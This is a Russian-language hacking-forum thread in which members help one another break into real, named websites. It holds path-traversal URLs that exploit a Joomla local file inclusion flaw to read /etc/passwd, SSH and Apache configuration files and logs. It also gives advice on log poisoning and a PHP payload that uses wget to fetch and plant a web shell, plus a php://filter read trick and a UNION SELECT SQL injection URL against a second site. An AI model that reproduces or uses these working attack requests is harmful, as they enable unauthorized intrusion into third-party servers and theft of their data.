Старый 03.11.2012, 18:13   #2481
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от M@ZAX@KEP Посмотреть сообщение
Плохо если у яндекса окажется несколько десятков ip под это дело.

Уверен, что так и окажется. И к тому же эти адреса будут с определенной постоянностью меняться.
Пока решил проблему
PHP код:
if(preg_match("/windows/i"$_SERVER['HTTP_USER_AGENT'])) 
Вроде пока помогает
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 04.11.2012, 01:37   #2482
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

То есть ни один пользователь, у которого в юзерагенте есть подстрока "windows", не зайдёт? Круто. xD
ЗЫ А зачем тут регулярка?
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 04.11.2012, 01:53   #2483
Matthew
 
Аватар для Matthew
 
Регистрация: 14.06.2011
Сообщений: 35
Репутация: 3
По умолчанию

Чтоб было куда девать вычислительные мощности (=
Matthew вне форума   Ответить с цитированием
Старый 05.11.2012, 07:58   #2484
llokely
 
Регистрация: 18.12.2011
Сообщений: 36
Репутация: 0
По умолчанию

Подскажите пожалуйста по прочтению конфигурационного файла самой жумлы если имеется такая lfi http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
Пробую вот так, но не срабатывает http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../home/host1000616/golden-bird.ru/htdocs/configuration.php%00
Это моя первая попытка с lfi, прошу строго не пинать
llokely вне форума   Ответить с цитированием
Старый 05.11.2012, 11:23   #2485
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

там код вида:
PHP код:
require_once('/home/host1000616/golden-bird.ru/htdocs/www/components/com_hello/controllers/' $_GET['controller'] . '.php'); 
т.е. текст configuration.php прочитать не получится т.к. он исполнится, а не "отдастся" текстом.

нужно искать способ
* или записать свой файл на сервер (например аватарку)
* или найти лог/файл (web, ftp, ssh, mail, session, ...) на сервере, в который возможно записать свою строку
и инклудить уже этот файл.

==========================================
... чуть позже ...

"глянул" lfi через toolza
=>
Цитата:
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../../../../../usr/local/apache2/conf/vhosts.conf%00
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../../../../../etc/ssh/sshd_config%00
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../../../../../usr/local/apache2/logs/access_log%00
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../../../../../etc/passwd%00

в /usr/local/apache2/conf/httpd.conf увидел /usr/local/apache2/logs/error_log
=>
http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../usr/local/apache2/logs/error_log%00
=>
судя по его содержанию похоже через него можно инклудить

Последний раз редактировалось DrakonHaSh; 05.11.2012 в 12:27..
DrakonHaSh вне форума   Ответить с цитированием
Старый 05.11.2012, 19:36   #2486
llokely
 
Регистрация: 18.12.2011
Сообщений: 36
Репутация: 0
По умолчанию

Спасибо за помощь, можете подсказать где я неправильно делаю? Запускаю тампер, обращаюсь к несуществующей странице и вместо юзерагента подставляю тампером <?php system(`wget http://mysite/shell.txt -O shell.php`)?> Затем иду по адресу http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../usr/local/apache2/logs/error_log%00 и в надежде что появится шелл по адресу http://golden-bird.ru/shell.php. Судя по прочитанным мною материалам последовательность действий верная, но шелл не появляется. Где я ошибаюсь?
llokely вне форума   Ответить с цитированием
Старый 05.11.2012, 21:07   #2487
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

Цитата:
Сообщение от llokely Посмотреть сообщение
обращаюсь к несуществующей странице и вместо юзерагента подставляю тампером <?php system(`wget http://mysite/shell.txt -O shell.php`)?> Затем иду по адресу http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../usr/local/apache2/logs/error_log%00
а где вы в этом error_log видели юзерагент ? (я его там не видел, видел там uri, видел там < и >)
изучайте лог, смотрите на то, что и как туда попадает, ищите способы записать туда <?php phpinfo(); ?>
включайте соображалку/помималку. моя консультация stop
DrakonHaSh вне форума   Ответить с цитированием
Старый 05.11.2012, 23:01   #2488
recfrf
 
Регистрация: 30.07.2010
Сообщений: 40
Репутация: 1
По умолчанию

php файл теоретически можно получить через php://filter/read=convert.base64-encode/resource.
лог начинается с 2009 года и вероятно до конца не прогузится, ищи где лежат логи непосредственно сайта, смотри на сайте хостера хелп, обычно пишут пути.
recfrf вне форума   Ответить с цитированием
Старый 06.11.2012, 06:26   #2489
llokely
 
Регистрация: 18.12.2011
Сообщений: 36
Репутация: 0
По умолчанию

Как я посмотрел, у этого хостера по умолчанию отключены логи непосредственно сайтов, так они должны лежать у него в domain_name/logs/, но мне по такому пути ничего не выдалось. Здесь же http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../usr/local/apache2/logs/error_log%00 не пишутся логи по доменам. Спасибо за помощь, буду пробовать дальше.
llokely вне форума   Ответить с цитированием
Старый 06.11.2012, 21:06   #2490
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

mod_rewrite там наруку - достаточно посмотреть ссылки на сайте и понять, что #(\bunion\b.*\bselect\b)#i фильтруется только тогда, когда является значением какого-либо параметра, заданного в чистом виде. Тогда:
Код:
http://www.45furniture.com/catalog/index.php/manufacturers_id/-1%20UNION%20SELECT%20version()%23
В данном случае символ +, кстати, не интерпретируется как пробел.
upd: Зачем же удалять исходный пост? Как в пустоту ответил.

Последний раз редактировалось Untitled; 07.11.2012 в 17:23..
Untitled вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot